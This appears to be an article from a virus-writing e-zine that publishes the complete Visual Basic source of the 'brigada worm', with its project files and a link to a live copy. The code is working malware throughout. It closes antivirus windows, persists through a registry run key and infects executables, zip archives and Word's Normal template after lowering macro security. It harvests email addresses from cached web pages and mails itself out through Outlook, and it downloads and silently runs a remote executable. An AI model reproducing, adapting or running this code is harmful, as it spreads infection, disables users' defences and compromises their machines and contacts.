<html>
<head>
<title>rRlf #3</title>
</head>
<body text="#ffffff" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>The Revoluti0n</i>
<br><table cellpadding="9">
<tr>
<th><a href="421.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="44.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>Strange Article - brigada worm a by alcopaul & PetiK</u></b>
<p><u>file B8.bas:</u>
<p>Attribute VB_Name = "Module1"
<br>Option Explicit
<br>Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
<br>Private Declare Function GetCommandLine Lib "kernel32" Alias "GetCommandLineA" () As Long
<br>Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long
<br>Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
<br>Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
<br>Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
<br>Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
<br>Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
<br>Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
<br>Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
<br>Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
<br>Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As Long, ByVal dwReserved As Long) As Long
<br>Private iResult As Long
<br>Private hProg As Long
<br>Private idProg As Long
<br>Private iExit As Long
<br>Const WM_CLOSE = &H10
<br>Const STILL_ACTIVE As Long = &H103
<br>Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
<br>Const EWX_SHUTDOWN = 1
<br>Const CSIDL_PERSONAL = &H5
<br>Const CSIDL_STARTUP = &H7
<br>Const CSIDL_TIF = &H20
<br>Const CSIDL_WIN = &H24
<br>Const CSIDL_WINSYS = &H25
<br>Const MAX_PATH = 260
<br>Private Type SHITEMID
<br>&nbsp;&nbsp;&nbsp;&nbsp;cb As Long
<br>&nbsp;&nbsp;&nbsp;&nbsp;abID As Byte
<br>End Type
<br>Private Type ITEMIDLIST
<br>&nbsp;&nbsp;&nbsp;&nbsp;mkid As SHITEMID
<br>End Type
<br>Sub Main()
<br>On Error Resume Next
<br>Dim vdir As String
<br>Dim lenhost As String
<br>Dim vc As String
<br>Dim mark As String
<br>Dim hostlen As String
<br>Dim virlen As String
<br>Dim buffhostlen As String
<br>Dim buffvirlen As String
<br>Call regcall
<br>Call killav
<br>vdir = App.path
<br>If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
<br>FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WIN) & "\Ms0701i32.exe"
<br>FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe"
<br>'--------------- check if virus or worm ------------------------
<br>Open vdir & App.EXEName & ".exe" For Binary Access Read As #1
<br>lenhost = (LOF(1))
<br>vc = Space(lenhost)
<br>Get #1, , vc
<br>Close #1
<br>mark = Right(vc, 2)
<br>If mark <> "b8" Then
<br>'worm
<br>Call extrkzip
<br>If InStr(1, GetCommLine, "-petikb8") = 0 Then
<br>Else
<br>Call wording
<br>Call zipinfect
<br>End If
<br>If InStr(1, GetCommLine, "-alcopaulb8") = 0 Then
<br>Else
<br>Call virustime
<br>End If
<br>If InStr(1, GetCommLine, "-trojanmode") = 0 Then
<br>Else
<br>ShutdownWindows EWX_SHUTDOWN
<br>End If
<br>listht GetSpecialfolder(CSIDL_TIF)
<br>Else
<br>'virus : execute the host
<br>Open vdir & App.EXEName & ".exe" For Binary Access Read As #4
<br>hostlen = (LOF(4) - 75264)
<br>virlen = (75264) 'worm/virus + zip component
<br>buffhostlen = Space(hostlen)
<br>buffvirlen = Space(virlen)
<br>Get #4, , buffvirlen
<br>Get #4, , buffhostlen
<br>Close #4
<br>Open vdir & "XxX.exe" For Binary Access Write As #3
<br>Put #3, , buffhostlen
<br>Close #3
<br>'borrowed from murkry's vb5 virus
<br>idProg = Shell(vdir & "XxX.exe", vbNormalFocus)
<br>hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
<br>GetExitCodeProcess hProg, iExit
<br>Do While iExit = STILL_ACTIVE
<br>DoEvents
<br>GetExitCodeProcess hProg, iExit
<br>Loop
<br>Kill vdir & "XxX.exe"
<br>End If
<br>'-------------------------------------------------------------------
<br>Call downloader
<br>End Sub
<br>'---------------------- kill avs --------------------------------------
<br>Sub killav()
<br>On Error Resume Next
<br>Dim avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11, avn12
<br>Dim aWindow As Long
<br>Dim angReturnValue As Long
<br>Dim num3, arrr3, av
<br>avn = "Pop3trap"
<br>avn1 = "JavaScan"
<br>avn2 = "Modem Booster"
<br>avn3 = "vettray"
<br>avn4 = "Timer"
<br>avn5 = "CD-Rom Monitor"
<br>avn6 = "F-STOPW Version 5.06c"
<br>avn7 = "PC-cillin 2000 : Virus Alert"
<br>avn8 = "DAPDownloadManager"
<br>avn9 = "Real-time Scan"
<br>avn10 = "IOMON98"
<br>avn11 = "AVP Monitor"
<br>avn12 = "NAI_VS_STAT"
<br>For num3 = 0 To 12
<br>arrr3 = Array(avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11, avn12)
<br>av = arrr3(num3)
<br>aWindow = FindWindow(vbNullString, av)
<br>angReturnValue = PostMessage(aWindow, WM_CLOSE, vbNull, vbNull)
<br>Next num3
<br>End Sub
<br>'-------------------------- download update and run it ----------------------
<br>Sub downloader()
<br>On Error Resume Next
<br>Dim databyte() As Byte
<br>If InternetGetConnectedState(0&, 0&) = 0 Then GoTo xIt
<br>Form1.Inet1.RequestTimeout = 40
<br>databyte() = Form1.Inet1.OpenURL("http://p0th0le.tripod.com/a.exe", icByteArray)
<br>Open "c:\update.exe" For Binary Access Write As #2
<br>Put #2, , databyte()
<br>Close #2
<br>Shell "c:\update.exe", vbHide
<br>xIt:
<br>End Sub
<br>'----------------------c:\WINDOWS file infection----------------
<br>Sub virustime()
<br>On Error Resume Next
<br>Dim vdir As String
<br>Dim sfile As String
<br>Dim a As String
<br>Dim arr1
<br>Dim lenhost As String
<br>Dim vc As String
<br>Dim mark As String
<br>Dim host
<br>vdir = App.path
<br>If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
<br>sfile = dir$(GetSpecialfolder(CSIDL_WIN) & "\*.exe")
<br>While sfile <> ""
<br>a = a & sfile & "/"
<br>sfile = dir$
<br>Wend
<br>arr1 = Split(a, "/")
<br>For Each host In arr1
<br>Open GetSpecialfolder(CSIDL_WIN) & "\" & host For Binary Access Read As #1
<br>lenhost = (LOF(1))
<br>vc = Space(lenhost)
<br>Get #1, , vc
<br>Close #1
<br>mark = Right(vc, 2)
<br>If mark <> "b8" Then
<br>GoTo notinfected
<br>Else
<br>GoTo gggoop
<br>End If
<br>notinfected:
<br>infect (GetSpecialfolder(CSIDL_WIN) & "\" & host)
<br>Exit For
<br>gggoop:
<br>Next host
<br>End Sub
<br>Function infect(hostpath As String)
<br>On Error Resume Next
<br>Dim ffile
<br>Dim hostcode As String
<br>Dim vir As String
<br>Dim vircode As String
<br>Dim header As String
<br>Dim f As String
<br>vir = App.path
<br>If Right(vir, 1) <> "\" Then vir = vir & "\"
<br>Open hostpath For Binary Access Read As #1
<br>hostcode = Space(LOF(1))
<br>Get #1, , hostcode
<br>Close #1
<br>Open vir & App.EXEName & ".exe" For Binary Access Read As #2
<br>header = Space(LOF(2))
<br>Get #2, , header
<br>Close #2
<br>f = "b8"
<br>Open hostpath For Binary Access Write As #3
<br>Put #3, , header
<br>Put #3, , hostcode
<br>Put #3, , f
<br>Close #3
<br>End Function
<br>'--------------------zip infection-----------------------------
<br>Sub zipinfect()
<br>On Error Resume Next
<br>list ("c:\")
<br>End Sub
<p>Sub list(dir)
<br>On Error Resume Next
<br>Dim fso, ssf, fil
<br>Set fso = CreateObject("Scripting.FileSystemObject")
<br>Set ssf = fso.GetFolder(dir).SubFolders
<br>For Each fil In ssf
<br>infection (fil.path)
<br>list (fil.path)
<br>Next
<br>End Sub
<p>Sub infection(dir)
<br>Dim fso, cf, fil, ext
<br>Set fso = CreateObject("Scripting.FileSystemObject")
<br>Set cf = fso.GetFolder(dir).Files
<br>For Each fil In cf
<br>ext = fso.GetExtensionName(fil.path)
<br>ext = LCase(ext)
<br>If (ext = "zip") Then
<br>Shell "c:\piss.exe " & fil.path & " " & GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe", vbHide
<br>End If
<br>Next
<br>End Sub
<br>'--------------------trojan mode payload-----------------------------
<br>Sub ShutdownWindows(ByVal intParamater As Integer)
<br>Dim blnReturn As Boolean
<br>blnReturn = ExitWindowsEx(intParamater, 0)
<br>End Sub
<br>'--------------------variable commandline-----------------------------
<br>Sub regcall()
<br>On Error Resume Next
<br>Dim b As String, c As String, d As String, ws As Object
<br>Dim regcol, final
<br>Set ws = CreateObject("WScript.Shell")
<br>b = "-alcopaulb8"
<br>c = "-petikb8"
<br>d = "-trojanmode"
<br>regcol = Array(b, c, d)
<br>Randomize
<br>final = regcol(Int(Rnd * 3))
<br>ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\b8", GetSpecialfolder(CSIDL_WINSYS) & "\Ms0701i32.exe " & final
<br>If dir("c:\regedit.exe") <> "regedit.exe" Then
<br>FileCopy GetSpecialfolder(CSIDL_WIN) & "\regedit.exe", "c:\regedit.exe"
<br>End If
<br>End Sub
<br>'--------------------extract zip software-----------------------------
<br>Sub extrkzip()
<br>On Error Resume Next
<br>Dim vdir As String
<br>Dim wormlen As String
<br>Dim rarlen As String
<br>Dim buffwormlen As String
<br>Dim buffrarlen As String
<br>vdir = App.path
<br>If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
<br>Open vdir & App.EXEName & ".exe" For Binary Access Read As #1
<br>wormlen = (LOF(1) - 63488)
<br>rarlen = (63488)
<br>buffwormlen = Space(wormlen)
<br>buffrarlen = Space(rarlen)
<br>Get #1, , buffwormlen
<br>Get #1, , buffrarlen
<br>Close #1
<br>Open "c:\piss.exe" For Binary Access Write As #2
<br>Put #2, , buffrarlen
<br>Close #2
<br>Shell "c:\piss.exe c:\brigada8.zip " & vdir & App.EXEName & ".exe", vbHide
<br>End Sub
<br>'--------------------e-mail collect and e-mailing-----------------------------
<br>Sub listht(dir)
<br>On Error Resume Next
<br>Dim fso, ssfh, filh
<br>Set fso = CreateObject("Scripting.FileSystemObject")
<br>Set ssfh = fso.GetFolder(dir).SubFolders
<br>For Each filh In ssfh
<br>infht (filh.path)
<br>listht (filh.path)
<br>Next
<br>End Sub
<p>Sub infht(dir)
<br>Dim mlto As String
<br>Dim fso, cfh, filh, ext, textline, q
<br>Dim j As Long, cnt As Long
<br>Set fso = CreateObject("Scripting.FileSystemObject")
<br>Set cfh = fso.GetFolder(dir).Files
<br>For Each filh In cfh
<br>ext = fso.GetExtensionName(filh.path)
<br>ext = LCase(ext)
<br>If (ext = "htm") Or (ext = "html") Then
<br>Open filh.path For Input As #1
<br>Do While Not EOF(1)
<br>Line Input #1, textline
<br>q = q & textline
<br>Loop
<br>Close #1
<br>For j = 1 To Len(q)
<br>If Mid(q, j, 7) = "mailto:" Then
<br>mlto = ""
<br>cnt = 0
<br>Do While Mid(q, j + 7 + cnt, 1) <> """"
<br>mlto = mlto + Mid(q, j + 7 + cnt, 1)
<br>cnt = cnt + 1
<br>Loop
<br>Call Worming(mlto)
<br>End If
<br>Next
<br>End If
<br>Next
<br>End Sub
<br>Function Worming(mail As String)
<br>On Error Resume Next
<br>Dim a, b, c
<br>Set a = CreateObject("Outlook.Application")
<br>Set b = a.GetNameSpace("MAPI")
<br>If a = "Outlook" Then
<br>b.Logon "profile", "password"
<br>Set c = a.CreateItem(0)
<br>c.Recipients.Add mail
<br>c.Subject = "check us out"
<br>c.Body = "we exist to give everyone a smiley face... :)"
<br>c.Attachments.Add "c:\brigada8.zip"
<br>c.Send
<br>c.DeleteAfterSubmit = True
<br>b.Logoff
<br>End If
<br>End Function
<br>'--------------------commandline parser-----------------------------
<br>Private Function GetCommLine() As String
<br>&nbsp;&nbsp;&nbsp;&nbsp;Dim RetStr As Long, SLen As Long
<br>&nbsp;&nbsp;&nbsp;&nbsp;Dim Buffer As String
<br>&nbsp;&nbsp;&nbsp;&nbsp;RetStr = GetCommandLine
<br>&nbsp;&nbsp;&nbsp;&nbsp;SLen = lstrlen(RetStr)
<br>&nbsp;&nbsp;&nbsp;&nbsp;If SLen > 0 Then
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;GetCommLine = Space$(SLen)
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;CopyMemory ByVal GetCommLine, ByVal RetStr, SLen
<br>&nbsp;&nbsp;&nbsp;&nbsp;End If
<br>End Function
<br>'--------------------get special folder-----------------------------
<br>Private Function GetSpecialfolder(CSIDL As Long) As String
<br>&nbsp;&nbsp;&nbsp;&nbsp;Dim r As Long
<br>&nbsp;&nbsp;&nbsp;&nbsp;Dim IDL As ITEMIDLIST
<br>&nbsp;&nbsp;&nbsp;&nbsp;Dim path As String
<br>&nbsp;&nbsp;&nbsp;&nbsp;r = SHGetSpecialFolderLocation(100, CSIDL, IDL)
<br>&nbsp;&nbsp;&nbsp;&nbsp;If r = 0 Then
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;path$ = Space$(512)
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal path$)
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;GetSpecialfolder = Left$(path, InStr(path, Chr$(0)) - 1)
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Exit Function
<br>&nbsp;&nbsp;&nbsp;&nbsp;End If
<br>&nbsp;&nbsp;&nbsp;&nbsp;GetSpecialfolder = ""
<br>End Function
<br>'------------------ document infection ---------------------------
<br>Sub wording()
<br>On Error Resume Next
<br>Dim vdir As String
<br>vdir = App.path
<br>If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
<br>FileCopy vdir & App.EXEName & ".exe", "c:\XXXview.exe"
<br>Open "c:\v.r" For Output As #2
<br>Print #2, "REGEDIT4"
<br>Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
<br>Print #2, """Level""=dword:00000001"
<br>Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
<br>Print #2, """Level""=dword:00000001"
<br>Print #2, """AccessVBOM""=dword:00000001"
<br>Close #2
<br>Shell "c:\regedit.exe /s c:\v.r", vbHide
<br>Kill "c:\v.r"
<br>Open "c:\nl.tmp" For Output As #9
<br>Print #9, "Sub document_close()"
<br>Print #9, "On Error Resume Next"
<br>Print #9, "Open ""c:\xp.exp"" For Output As 2"
<br>Print #9, "Print #2, ""sub document_open()"""
<br>Print #9, "Print #2, ""On Error Resume Next"""
<br>Print #9, "Print #2, ""jbo = ActiveDocument.Shapes(1).OLEFormat.ClassType"""
<br>Print #9, "Print #2, ""With ActiveDocument.Shapes(1).OLEFormat"""
<br>Print #9, "Print #2, ""    .ActivateAs ClassType:=jbo"""
<br>Print #9, "Print #2, ""    .Activate"""
<br>Print #9, "Print #2, ""End With"""
<br>Print #9, "Print #2, ""end sub"""
<br>Print #9, "Close 2"
<br>Print #9, "Set fso = CreateObject(""Scripting.FileSystemObject"")"
<br>Print #9, "Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule"
<br>Print #9, "Set iw = fso.OpenTextFile(""c:\xp.exp"", 1, True)"
<br>Print #9, "nt.DeleteLines 1, nt.CountOfLines"
<br>Print #9, "i = 1"
<br>Print #9, "Do While iw.atendofstream <> True"
<br>Print #9, "b = iw.readline"
<br>Print #9, "nt.InsertLines i, b"
<br>Print #9, "i = i + 1"
<br>Print #9, "Loop"
<br>Print #9, "ActiveDocument.Shapes.AddOLEObject _"
<br>Print #9, "FileName:=""c:\XXXview.exe"", _"
<br>Print #9, "LinkToFile:=False"
<br>Print #9, "ActiveDocument.Save"
<br>Print #9, "Open ""c:\b8.r"" For Output As #3"
<br>Print #9, "Print #3, ""REGEDIT4"""
<br>Print #9, "Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"""
<br>Print #9, "Print #3, """"""Level""""=dword:00000001"""
<br>Print #9, "Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"""
<br>Print #9, "Print #3, """"""Level""""=dword:00000001"""
<br>Print #9, "Print #3, """"""AccessVBOM""""=dword:00000001"""
<br>Print #9, "Close #3"
<br>Print #9, "Shell ""c:\regedit.exe /s c:\b8.r"", vbHide"
<br>Print #9, "Kill ""c:\b8.r"""
<br>Print #9, "End Sub"
<br>Close #9
<br>Open GetSpecialfolder(CSIDL_STARTUP) & "\startup.vbs" For Output As #6
<br>Print #6, "On Error Resume Next"
<br>Print #6, "Set fso = CreateObject(""Scripting.FileSystemObject"")"
<br>Print #6, "Set oword = CreateObject(""Word.Application"")"
<br>Print #6, "oword.Visible = False"
<br>Print #6, "Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule"
<br>Print #6, "Set iw = fso.OpenTextFile(""c:\nl.tmp"", 1, True)"
<br>Print #6, "nt.DeleteLines 1, nt.CountOfLines"
<br>Print #6, "i = 1"
<br>Print #6, "Do While iw.atendofstream <> True"
<br>Print #6, "b = iw.readline"
<br>Print #6, "nt.InsertLines i, b"
<br>Print #6, "i = i + 1"
<br>Print #6, "Loop"
<br>Print #6, "oword.NormalTemplate.Save"
<br>Print #6, "oword.NormalTemplate.Close"
<br>Print #6, "oword.quit"
<br>Close #6
<br>End Sub
<br>&nbsp;
<br>&nbsp;
<br><u>file B8.frm:</u>
<p>VERSION 5.00
<br>Object = "{48E59290-9880-11CF-9754-00AA00C00908}#1.0#0"; "MSINET.OCX"
<br>Begin VB.Form Form1 
<br>&nbsp;&nbsp;&nbsp;BorderStyle&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;'None
<br>&nbsp;&nbsp;&nbsp;Caption&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;"Form1"
<br>&nbsp;&nbsp;&nbsp;ClientHeight&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;3840
<br>&nbsp;&nbsp;&nbsp;ClientLeft&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;0
<br>&nbsp;&nbsp;&nbsp;ClientTop&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;0
<br>&nbsp;&nbsp;&nbsp;ClientWidth&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;4035
<br>&nbsp;&nbsp;&nbsp;LinkTopic&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;"Form1"
<br>&nbsp;&nbsp;&nbsp;MaxButton&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;'False
<br>&nbsp;&nbsp;&nbsp;MinButton&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;'False
<br>&nbsp;&nbsp;&nbsp;ScaleHeight&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;3840
<br>&nbsp;&nbsp;&nbsp;ScaleWidth&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;4035
<br>&nbsp;&nbsp;&nbsp;ShowInTaskbar&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;'False
<br>&nbsp;&nbsp;&nbsp;StartUpPosition&nbsp;=&nbsp;&nbsp;&nbsp;3&nbsp;&nbsp;'Windows Default
<br>&nbsp;&nbsp;&nbsp;Begin InetCtlsObjects.Inet Inet1 
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Left&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;1680
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Top&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;1200
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;_ExtentX&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;1005
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;_ExtentY&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;1005
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;_Version&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&nbsp;&nbsp;393216
<br>&nbsp;&nbsp;&nbsp;End
<br>End
<br>Attribute VB_Name = "Form1"
<br>Attribute VB_GlobalNameSpace = False
<br>Attribute VB_Creatable = False
<br>Attribute VB_PredeclaredId = True
<br>Attribute VB_Exposed = False
<br>&nbsp;
<br>&nbsp;
<br><u>file B8.vbp:</u>
<p>Type=Exe
<br>Form=B8.frm
<br>Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\WINDOWS\SYSTEM\StdOle2.Tlb#OLE Automation
<br>Module=Module1; B8.bas
<br>Object={48E59290-9880-11CF-9754-00AA00C00908}#1.0#0; MSINET.OCX
<br>IconForm="Form1"
<br>Startup="Sub Main"
<br>HelpFile=""
<br>Title="B8"
<br>ExeName32="Project1.exe"
<br>Path32="..\.."
<br>Command32=""
<br>Name="Project1"
<br>HelpContextID="0"
<br>CompatibleMode="0"
<br>MajorVer=1
<br>MinorVer=0
<br>RevisionVer=0
<br>AutoIncrementVer=0
<br>ServerSupportFiles=0
<br>VersionComments="brigada.worm by petik and alcopaul"
<br>VersionCompanyName="http://brigada8.cjb.net"
<br>CompilationType=-1
<br>OptimizationType=0
<br>FavorPentiumPro(tm)=0
<br>CodeViewDebugInfo=0
<br>NoAliasing=0
<br>BoundsCheck=0
<br>OverflowCheck=0
<br>FlPointCheck=0
<br>FDIVCheck=0
<br>UnroundedFP=0
<br>StartMode=0
<br>Unattended=0
<br>Retained=0
<br>ThreadPerObject=0
<br>MaxNumberOfThreads=1
<br>&nbsp;
<br>&nbsp;
<br><u>file B8.vbw:</u>
<p>Form1 = 0, 0, 0, 0, C, 22, 22, 573, 470, C
<br>Module1 = 44, 44, 595, 492, 
<p><a href="43.zip">living virus</a>
</body>
</html>
